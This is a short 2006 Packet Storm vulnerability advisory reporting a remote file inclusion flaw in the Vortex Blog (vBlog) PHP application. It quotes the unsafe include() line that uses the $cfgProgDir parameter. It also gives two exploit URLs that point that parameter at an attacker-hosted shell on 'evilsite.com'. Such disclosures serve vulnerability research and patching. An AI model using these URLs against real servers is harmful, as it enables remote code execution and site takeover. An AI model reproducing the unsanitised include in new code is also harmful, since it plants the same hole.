vblog1201-rfi.txt

2006-11-09T00:00:00
ID PACKETSTORM:51814
Type packetstorm
Reporter Dr.Pantagon
Modified 2006-11-09T00:00:00

Description

                                        
                                            `**********************************************************************************************************  
WwW.Deltahacking.NeT (Priv8 Site)  
WwW.Deltahacking.Ir (Public Site)  
**********************************************************************************************************  
  
* Portal Name :Vortex Blog AKA vBlog  
  
* Class = Remote File Inclusion ;  
  
* Download =http://switch.dl.sourceforge.net/sourceforge/c12/C12_a0.1_nonfunc.zip  
  
* Found by = Dr.Pantagon (rezayavari2006@yahoo.com)  
  
--------------------------------------------------------------------------------------------  
  
--------------  
- Vulnerable Code  
  
include($cfgProgDir . "session.php");  
  
++++++++++++++++++++++++++++++++++++++++++++  
  
- Exploit:  
  
  
http://[target]/[path]/admin/auth/secure.php?cfgProgDir=http://evilsite.com/shell?  
http://[target]/[path]/admin/auth/checklogin.php?cfgProgDir=http://evilsite.com/shell?  
  
  
--------------------------------------------------------------------------------------------  
  
--------------  
  
Special Thanks : Dr.Trojan , Hiv++ , D_7j , Lord  
Special Thanks To Best My Friend : Tanha  
  
**********************************************************************************************************  
`